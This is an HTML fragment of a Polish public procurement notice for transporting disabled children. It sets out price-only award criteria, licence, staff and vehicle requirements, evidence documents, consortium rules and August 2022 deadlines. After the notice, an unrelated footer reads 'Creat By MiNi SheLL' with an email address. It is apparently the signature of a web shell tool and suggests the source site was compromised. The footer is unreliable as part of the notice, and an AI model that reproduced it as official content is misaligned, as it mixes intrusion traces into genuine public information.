class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>Nazwa kryterium: Waga:<br/>1 Cena (koszt) 100%<br/>cena – 100 % (waga kryterium wyrażona w %) <br/>2. Punkty przyznawane za kryterium cena będą liczone następująco:<br/>Kryterium: Wzór:<br/>Kryterium to będzie rozpatrywane, na podstawie ceny oferty brutto podanej przez Wykonawcę w ofercie stanowiącej załącznik nr 1 do SWZ<br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>W powyższym kryterium maksymalnie można otrzymać 100 punktów<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.<br/>4.	Suma punktów uzyskanych stanowić będzie końcową ocenę danej oferty. <br/>5.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>6.	Wykonawca poda cenę ofertową na formularzu oferty, zgodnie z załącznikiem nr 1 do SWZ.<br/>7.	Podana cena ofertowa musi zawierać wszystkie koszty związane z realizacją zamówienia, wynikające <br/>z opisu przedmiotu zamówienia (załącznik nr 2) – cena ryczałtowa. Cena ta będzie stała i nie może się zmienić, za wyjątkiem przypadków opisanych w projektowanych postanowieniach umowy w sprawie zamówienia, które zostaną wprowadzone do treści tej umowy, a które stanowią załącznik nr 3 do SWZ.<br/>8.	Cena ofertowa musi być podana w złotych polskich (PLN), cyfrowo (do drugiego miejsca po przecinku).<br/>9.	Za ofertę najkorzystniejszą, będzie uznana oferta, która przy uwzględnieniu powyższego kryterium i jego wagi otrzyma najwyższą punktację – 100 pkt. <br/>10.	Wykonawca, składając ofertę (na formularzu oferty, zgodnie z załącznikiem nr 1 do SWZ) informuje Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, wskazując:<br/>1)	nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>2)	wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>3)	stawkę podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/>11.	Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Uwaga: Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U. z 2020 r. poz. 106, z późn.zm.), dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>Uwaga: Zamawiający jest uprawniony do zastosowania kryterium ceny o wadze przekraczającej 60%. Dokumenty opisujące przedmiot zamówienia są opisane z najwyższą starannością i precyzją w Szczegółowym Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 2 do SWZ. Bez względu na fakt, kto będzie Wykonawcą przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest zestandaryzowany, niezależnie od tego, który z Wykonawców go wykona).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.1.	Zdolność do występowania w obrocie gospodarczym – Zamawiający nie określa warunku w powyższym zakresie.<br/><br/>3.2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/><br/>3.2.1.	Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na transporcie drogowym osób – obszar prowadzenia przewozu osób – Rzeczpospolita Polska. <br/>Uwaga: W przypadku wykonywania usługi przez podmioty wspólnie składające ofertę, warunek dotyczący uprawnień do prowadzenia, o którym mowa powyżej – uznawać się będzie za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia i zrealizuje usługi do których te uprawnienia są wymagane. <br/><br/>3.3.	Sytuacja ekonomiczna lub finansowa – Zamawiający nie określa warunku w powyższym zakresie.<br/><br/>3.4.	Zdolność techniczna lub zawodowa:<br/>3.4.1.	Wykonawca spełni warunek jeśli przedstawi wykaz usług:<br/>Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, <br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/><br/>3.4.1.1.	W tym zakresie Zamawiający wymaga:<br/><br/>minimum 1 usługi na podstawie jednej umowy polegającej na świadczeniu usług przewozu osób niepełnosprawnych przez okres ciągły minimum 9 miesięcy o wartości minimum 50 000,00 złotych brutto, lub 2 usług, z których każda realizowana na podstawie jednej umowy polegającej na świadczeniu usług przewozu osób niepełnosprawnych przez okres ciągły minimum 9 miesięcy - w tym samym czasie, przy czym wartość każdej usługi za okres 9 miesięcy powinna wynosić co najmniej 25 000 złotych brutto,<br/>Uwaga: Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, warunek o którym wyżej mowa, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>Uwaga: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, należy wykazać usługę (zakres), w której Wykonawca bezpośrednio uczestniczył.<br/><br/>3.4.2.	Wykonawca spełni warunek jeśli przedstawi wykaz osób:<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/><br/>3.4.2.1.	W tym zakresie Zamawiający wymaga by Wykonawca przy realizacji zamówienia dysponował:<br/>a)	kierowcą spełniającym wszelkie wymagania określone w art. 39a ustawy z dnia 6 września 2001 r. <br/>o transporcie drogowym (tj. Dz.U. z 2022 r. poz. 180 z późn.zm)<br/>b)	opiekunem posiadającym przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej oraz mającym przygotowanie pedagogiczne. Zamawiający pod pojęciem przygotowanie pedagogiczne rozumie nabycie wiedzy i umiejętności z zakresu psychologii, pedagogiki i dydaktyki szczegółowej. O posiadaniu przygotowania pedagogicznego będzie świadczyć dyplom ukończenia studiów lub inny dokument wydany przez uczelnię, dyplom ukończenia zakładu kształcenia nauczycieli lub świadectwo ukończenia kursu kwalifikacyjnego.<br/><br/>3.4.2.2.	Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, tj.:<br/>co najmniej 1 kierowcą, spełniającym wymagania określone w art. 39a ust.1 ustawy <br/>z dnia 6 września 2001r. o transporcie drogowym (tj. Dz.U. z 2022 r. poz. 180 z późn.zm.) oraz co najmniej 1 opiekunem;<br/><br/>3.4.3.	Wykonawca spełni warunek jeśli przedstawi wykaz narzędzi:<br/>Wykaz narzędzi w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami; tj. marka pojazdu, model, liczba miejsc siedzących zgodnie <br/>z dowodem rejestracyjnym, nr rejestracyjny, rok produkcji, norma emisji spalin, wyposażenie dostosowane do przewozu osób niepełnosprawnych (jeżeli dotyczy). <br/>3.4.3.1.	W tym zakresie Zamawiający wymaga by Wykonawca wykazał, że przy realizacji zamówienia będzie dysponował: dopuszczonym do ruchu, specjalnie oznakowanym pojazdem samochodowym (zgodnie z art. 58 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2022 poz. 988)), sprawnym technicznie pojazdem a w przypadku konieczności przewozu osoby na wózku inwalidzkim przystosowanym konstrukcyjnie do przewozu osób niepełnosprawnych, wyposażonym w specjalistyczny sprzęt, tj.: podnośnik/najazd lub nisko usytuowane wejście do pojazdu, szyny, rampy lub windy, blokady, pasy do mocowania wózków, wyprodukowanymi nie wcześniej niż <br/>w 2015 r. z których:<br/>a)	dysponuje co najmniej 1 pojazdem, który będzie przystosowany do przewozu co najmniej 6 dzieci poruszających się samodzielnie, 1 kierowcy i 1 opiekuna.<br/><br/>Pojazd do transportu dzieci i uczniów powinien spełniać normy dopuszczalnej emisji spalin – norma Euro 6. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania (określonych przez Zamawiającego w Rozdziale XI SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia w wyznaczonym terminie nie krótszym niż 5 dni aktualnych<br/>na dzień złożenia podmiotowych środków dowodowych ( aktualnych na dzień ich złożenia):<br/>1.1. Informacji z Krajowego Rejestru Karnego w zakresie określonym:<br/>a) w art. 108 ust. 1 pkt 1 i 2 ustawy,<br/>b) w art. 108 ust. 1 pkt 4 ustawy.<br/>- wystawionej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>1.2. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 i 6 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>1.3. Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 5k Rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z<br/>działaniami Rosji destabilizującymi sytuację na Ukrainie, dodanym Rozporządzeniem Rady (UE) 2022/576 z dnia 8 kwietnia 2022 r.<br/>w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji<br/>destabilizującymi sytuację na Ukrainie (Dz.Urz.UE nr L 111 z 8.04.2022 r. str. 1) i art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.<br/>Uwaga: W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia i dokumenty w zakresie ust. 1.1 –<br/>1.3. niniejszego rozdziału SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.4. W celu wykazania spełniania warunku z rozdziału XI ust. 3.2.1<br/>Kopię aktualnej licencji na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia<br/>6 września 2001 r. o transporcie drogowym (tj. Dz.U. z 2022 r. poz. 180 z późn. zm)<br/>1.5. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.1.<br/>- wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie.<br/>Uwaga: Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane,<br/>a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>1.6. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.2.<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>1.7. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.3.<br/>- wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie dysponowania tymi zasobami.<br/>1.8. Kopię zawartej polisy OC w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem niniejszego zamówienia<br/>wraz z potwierdzeniem opłaty składek na kwotę<br/>minimum 25 000 zł.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu jak<br/>wyżej, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>3. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne,<br/>Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych<br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>4. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art.125 ust.1,<br/>dane umożliwiające dostęp do tych środków.<br/>Kopię aktualnej licencji na wykonywanie krajowego transportu drogowego osób.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.5. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.1.<br/>- wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem<br/>dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>Uwaga: Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane,<br/>a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>Wykonawcy, w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>1.6. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.2.<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych<br/>za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>1.7. W celu wykazania spełniania warunku z rozdziału XI ust. 3.4.3.<br/>- wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami.<br/>1.8. Kopię zawartej polisy OC w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem niniejszego<br/>zamówienia wraz z potwierdzeniem opłaty składek – na kwotę minimum 25 000 zł. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1. Przez Wykonawców wspólnie ubiegających się o zamówienie rozumie się np. konsorcjum firm, spółkę cywilną. W<br/>przypadku wykonawców będących spółką cywilną, zaleca się aby pełnomocnictwo do reprezentowania wspólników jako<br/>wykonawców wspólnie ubiegających się o zamówienie, zostało podpisane przez wszystkich wspólników spółki cywilnej,<br/>zgodnie z rozdziałem XVIII ust. 2 pkt. 2.3 SWZ.<br/>1.2. W przypadku, wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Jeżeli w imieniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dołączonego pełnomocnictwa, Zamawiający w toku postępowania wezwie Wykonawcę do złożenia stosownego<br/>pełnomocnictwa. Zaleca się, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w złożonym na wezwanie<br/>pełnomocnictwie lub w odrębnym oświadczeniu, potwierdzili czynności dokonane przez tzw. pełnomocnika rzekomego w<br/>okresie, kiedy nie posiadał on stosownego umocowania, pod rygorem nieważności czynności prawnej dokonanej w cudzym<br/>imieniu bez umocowania lub z przekroczeniem jego zakresu<br/>1.3. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia warunek zdolności technicznej i/lub<br/>zawodowej winien być spełniony łącznie.<br/>1.4. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, potwierdzenie braku podstaw do<br/>wykluczenia winno być spełnione przez każdego z Wykonawców.<br/>1.5. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Wykonawcy składają Oświadczenie, o<br/>którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy. W<br/>odniesieniu do warunku dotyczącego doświadczenia określonego przez Zamawiającego w rozdziale XI ust. 3 pkt. 3.4.1.<br/>SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców,<br/>którzy wykonają usługi, do realizacji, których te zdolności są wymagane – załącznik 1b do Formularza Ofertowego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, są zawarte w załączniku nr 3 <br/>2. Zamawiający dopuszcza możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym w projektowanych postanowieniach umowy stanowiących<br/>załącznik nr 3 do SWZ.<br/>3. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXI SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com